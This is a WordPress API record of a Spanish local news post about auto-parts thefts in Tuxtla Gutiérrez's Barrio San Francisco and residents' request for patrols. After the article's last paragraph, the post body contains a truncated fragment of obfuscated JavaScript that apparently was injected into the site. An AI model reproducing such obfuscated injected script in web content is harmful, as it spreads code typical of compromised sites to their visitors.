{"id":7897,"date":"2023-01-07T00:23:28","date_gmt":"2023-01-07T00:23:28","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=7897"},"modified":"2023-01-07T00:23:28","modified_gmt":"2023-01-07T00:23:28","slug":"denuncian-robo-de-autopartes-en-el-barrio-san-francisco-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=7897","title":{"rendered":"Denuncian robo de autopartes en el Barrio San Francisco de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"540\" height=\"733\" data-id=\"7898\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230106-WA0039.jpg\" alt=\"\" class=\"wp-image-7898\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230106-WA0039.jpg 540w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/01\/IMG-20230106-WA0039-221x300.jpg 221w\" sizes=\"auto, (max-width: 540px) 100vw, 540px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 5 de enero del 2023. Tuxtla Guti\u00e9rrez.- Un grupo de habitantes del Barrio San Francisco en la zona Sur de Tuxtla, denuncian la presencia de ladrones de autopartes.<\/p>\n\n\n\n<p>De acuerdo con Rogelio, uno de los afectados exponen que en los \u00faltimos d\u00edas, dej\u00f3 su vocho estacionado en la 1a Oriente, entre 20 y 21 Sur cuando al salir como de costumbre cuando se percat\u00f3 que le hab\u00edan robado su bater\u00eda, el sill\u00f3n, equipo de sonido, pantallas y documentos personales.<\/p>\n\n\n\n<p>En el lugar hay c\u00e1maras de vigilancia, en donde qued\u00f3 el registro que el responsable es un hombre de unos 30 a\u00f1os de edad que vest\u00eda playera negra, pantal\u00f3n negro, tenis negros, cubrebocas y mochila negros.<\/p>\n\n\n\n<p>Sin embargo, los colonos dan a conocer que, este sujeto lleva tiempo operando en esta zona de la ciudad.<\/p>\n\n\n\n<p>Por ello piden que, se implemente patrullajes para frenar este tipo de robos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 5 de enero del 2023. Tuxtla Guti\u00e9rrez.- Un grupo de habitantes del Barrio San Francisco en la zona Sur de Tuxtla, denuncian la presencia de ladrones de autopartes. De acuerdo con Rogelio, uno de los afectados exponen que en los \u00faltimos d\u00edas, dej\u00f3 su vocho estacionado en la 1a Oriente, entre &hellip;<\/p>\n","protected":false},"author":2,"featured_media":7898,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-7897","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7897","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7897"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7897\/revisions"}],"predecessor-version":[{"id":7899,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/7897\/revisions\/7899"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/7898"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7897"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7897"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7897"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}